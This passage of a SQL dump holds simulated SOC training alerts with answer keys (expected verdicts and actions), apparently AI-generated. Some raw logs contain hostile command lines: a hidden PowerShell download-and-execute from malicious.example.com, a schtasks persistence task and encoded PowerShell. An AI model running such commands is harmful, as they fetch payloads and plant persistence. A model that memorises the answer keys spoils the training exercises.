macro execution as part of an update process\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the HR department machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Upon review, the macro execution was identified as part of a routine update, leading to a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2221, 'Packed Executable Analyzed - False Positive', 'medium', 'Ghidra', 'A packed executable was analyzed and initially flagged as suspicious, but further investigation confirmed it was benign software.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:22:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.15\",\"dst_ip\":\"198.51.100.50\",\"username\":\"mjones\",\"hostname\":\"ENGINEERING-PC03\",\"command_line\":\"C:\\\\Program Files\\\\EngineeringSoftware\\\\install.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"IP is associated with legitimate software updates\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash corresponds to verified engineering software\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\EngineeringSoftware\\\\install.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Installation executable for recognized software\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.20.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the engineering department machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable was initially flagged due to packing, but was identified as a legitimate engineering tool.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2222, 'Malicious Macro Executed - Attempt to Gain Persistence', 'critical', 'Cuckoo Sandbox', 'A malicious macro was executed, attempting to create a scheduled task for persistence, linked to a known threat actor.', 'Malware', 'T1053', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:15:42Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.20\",\"dst_ip\":\"203.0.113.25\",\"username\":\"slee\",\"hostname\":\"CEO-LAPTOP\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\schtasks.exe /Create /SC Daily /TN \\\"Updater\\\" /TR \\\"C:\\\\Temp\\\\update.vbs\\\"\",\"file_hash\":\"abcdef1234567890abcdef1234567890\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP has been used in multiple APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcdef1234567890abcdef1234567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro hash associated with known malware for persistence\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\System32\\\\schtasks.exe /Create /SC Daily /TN \\\"Updater\\\" /TR \\\"C:\\\\Temp\\\\update.vbs\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Scheduled task creation for persistence on the host\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the CEO\'s laptop\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The creation of a scheduled task for persistence, along with communication to a C2 server, confirms the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2223, 'Suspicious Packed Executable Detected via IDA Pro Analysis', 'high', 'IDA Pro', 'A packed executable was detected attempting to execute on a victim machine. Reverse engineering revealed suspicious code execution patterns indicative of malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"hostname\":\"victim-pc\",\"command_line\":\"C:\\\\Windows\\\\temp\\\\malware.exe /silent\",\"file_hash\":\"4a1d8f72c873e6f8d7a2d4f1b6c8d9e3\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 102 times for hosting malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a1d8f72c873e6f8d7a2d4f1b6c8d9e3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan.Packed\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Executable packed with known malicious patterns; confirmed via reverse engineering and OSINT.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2224, 'Macro-Based Malware Execution Detected via Ghidra', 'critical', 'Ghidra', 'Analysis of a macro-enabled document revealed code execution leading to a PowerShell payload download. This indicates a macro-based initial access attempt.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"workstation-12\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\asmith\\\\Documents\\\\malicious.ps1\",\"file_hash\":\"b52c8f33f2a9e8fbd7e5a7c9a2f4d1e2\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with C2 server activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b52c8f33f2a9e8fbd7e5a7c9a2f4d1e2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script identified as malicious PowerShell payload\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"PowerShell script execution from macro indicates a sophisticated attack vector.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2225, 'Cuckoo Sandbox Alert: Malicious Macro Execution Attempt', 'medium', 'Cuckoo Sandbox', 'An analysis of a document revealed an embedded macro attempting to execute a suspicious command that downloads a file from an external IP.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.75\",\"username\":\"bwhite\",\"hostname\":\"office-pc-5\",\"command_line\":\"cmd.exe /c powershell -w hidden -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/script.ps1\')\\\"\",\"file_hash\":\"d4c3b2a1e8f5c6d7b9a8e7f6c5d4b3a2\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malicious scripts\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d4c3b2a1e8f5c6d7b9a8e7f6c5d4b3a2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious macro script execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution indicates an attempt to download and execute a malicious script.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2226, 'Any.Run Analysis Flagged Benign Script Execution', 'low', 'Any.Run', 'A scheduled script execution was flagged for unusual activity. Further analysis revealed it to be a legitimate system update process.', 'Malware', 'T1059.004', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.80\",\"username\":\"csysadmin\",\"hostname\":\"server01\",\"command_line\":\"C:\\\\Windows\\\\system32\\\\update.exe /auto\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with legitimate update server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\system32\\\\update.exe /auto\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate system update command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The script was part of a routine system update process and posed no threat.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2227, 'Ghidra Analysis of Suspicious Script Reveals Benign Activity', 'low', 'Ghidra', 'A script flagged for potentially malicious behavior was analyzed and found to be a part of an automated backup task.', 'Malware', 'T1086', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.90\",\"username\":\"backupuser\",\"hostname\":\"backup-server\",\"command_line\":\"backupscript.sh --run\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Backup destination IP is clean\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"backupscript.sh --run\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as part of a scheduled backup process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The script execution is part of a scheduled backup task and is non-malicious.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2228, 'Suspicious Packed Executable Detected', 'high', 'Cuckoo Sandbox', 'A packed executable with a known malicious hash was detected on an internal machine. Reverse engineering tools have flagged the binary for further analysis.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":null,\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC-01\",\"command_line\":\"C:\\\\Temp\\\\malicious_packed_exe.exe\",\"file_hash\":\"c0ffeeaddbabe123456789abcdef123456789abc\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"c0ffeeaddbabe123456789abcdef123456789abc\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Temp\\\\malicious_packed_exe.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable flagged for suspicious behavior.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash is confirmed malicious, correlating with known malware signatures.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2229, 'Malicious Macro Detected in Email Attachment', 'critical', 'Ghidra', 'A malicious macro embedded in a Word document was detected. The macro is designed to download and execute further payloads.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.42\",\"username\":\"asmith\",\"hostname\":\"INTERNAL-PC-02\",\"email_sender\":\"attacker@example.com\",\"file_hash\":\"deadbeef1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"deadbeef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified in multiple malicious macro analysis reports.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro\'s behavior and associated hash confirm malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2230, 'Suspicious Network Activity from Internal Host', 'medium', 'Any.Run', 'Unusual network traffic from an internal host was observed communicating with a known C2 server.', 'Lateral Movement', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.155\",\"username\":\"bthomas\",\"hostname\":\"INTERNAL-SRV-01\",\"domain\":\"malicious-c2.example.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.155\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known to be a command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-c2.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The destination IP and domain are linked to known C2 infrastructure.\"}', 'Intermediate', 'MAL', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2231, 'Benign Code Execution Flagged by Reverse Engineering Tool', 'low', 'IDA Pro', 'An internal script execution was mistakenly flagged due to a false signature match. No malicious activity was detected.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":null,\"username\":\"mwhite\",\"hostname\":\"INTERNAL-LAPTOP-01\",\"command_line\":\"C:\\\\Scripts\\\\routine_task.exe\",\"file_hash\":\"beefcafe1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"beefcafe1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not associated with any known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Scripts\\\\routine_task.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Executable identified as routine internal task.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert was triggered by a false signature match; no threat found.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2232, 'False Positive: Internal Script Misidentified as Threat', 'low', 'Any.Run', 'A routine script execution within the network was flagged as suspicious due to heuristic analysis, but no malicious intent was identified upon review.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.90\",\"dst_ip\":null,\"username\":\"klee\",\"hostname\":\"INTERNAL-WORKSTATION-03\",\"command_line\":\"C:\\\\Utilities\\\\internal_tool.exe\",\"file_hash\":\"cafebabe1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"cafebabe1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not associated with any known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Utilities\\\\internal_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Executable verified as a legitimate internal tool.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution was part of normal operations, misflagged by heuristics.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2233, 'Packed Executable Detected via Reverse Engineering', 'high', 'IDA Pro', 'A packed executable was deobfuscated using reverse engineering tools, revealing malicious code meant for data exfiltration.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"/usr/bin/ida_pro /malware/suspicious_file.exe\",\"file_hash\":\"7d2f8d8c9a1b0c9eb0f5e7e8f2d2f5b9\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7d2f8d8c9a1b0c9eb0f5e7e8f2d2f5b9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a Trojan with data exfiltration capabilities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"/usr/bin/ida_pro /malware/suspicious_file.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of potentially malicious executable\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The unpacked executable reveals known malicious patterns linked to data exfiltration.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2234, 'Malicious Macro Executed in Document', 'critical', 'Ghidra', 'A document containing macros was reverse engineered, revealing a PowerShell script designed to download additional payloads from a C2 server.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.150\",\"username\":\"asmith\",\"hostname\":\"laptop-02\",\"command_line\":\"powershell.exe -EncodedCommand aQBlAHgAQQBNAHAAbABlAC4AZABvAGMALgB4AHgAcwBzAA==\",\"file_hash\":\"b9f1a9d8c2d5f7e8f1d2f3b9e8f7b2c3\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported several times for hosting malicious scripts\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b9f1a9d8c2d5f7e8f1d2f3b9e8f7b2c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro document with embedded PowerShell script\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aQBlAHgAQQBNAHAAbABlAC4AZABvAGMALgB4AHgAcwBzAA==\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command execution\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell script was part of a macro designed to download additional malicious payloads.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2235, 'Suspicious Network Traffic Identified', 'medium', 'Any.Run', 'Unusual traffic patterns from an internal IP were analyzed but revealed no malicious activity upon further investigation.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"198.51.100.10\",\"username\":\"mwhite\",\"hostname\":\"workstation-03\",\"file_hash\":\"d4f3b8c9e2a9b1c0d1e7f8b9c2a1f5d8\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this destination IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Despite initial suspicion, the network traffic analysis showed no signs of data exfiltration.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2236, 'Macro-based Phishing Document Identified', 'medium', 'Cuckoo Sandbox', 'A document received via email with suspicious macros was analyzed but determined to be benign upon further inspection.', 'Phishing', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.110\",\"username\":\"jwright\",\"hostname\":\"laptop-04\",\"email_sender\":\"unknown@maliciousdomain.com\",\"file_hash\":\"a2b0f9d8c2d1f7e9f1b2c3e4d5f6a7b8\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.110\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"unknown@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain registered recently with no known malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a2b0f9d8c2d1f7e9f1b2c3e4d5f6a7b8\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected in the file\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The document contained macros, but they were found to be non-malicious after detailed analysis.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2237, 'Reverse Engineering Reveals Malicious Macro', 'critical', 'Ghidra', 'A suspicious document analyzed with reverse engineering tools revealed a macro containing a Base64 encoded PowerShell script for credential dumping.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.150\",\"dst_ip\":\"\",\"username\":\"tgreen\",\"hostname\":\"finance-laptop\",\"command_line\":\"powershell.exe -EncodedCommand Y3JlZGVudGlhbHMuZHVtcA==\",\"file_hash\":\"e1f2a3d4c5b6f7e8d9c0b1a2e3f4d5c6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP 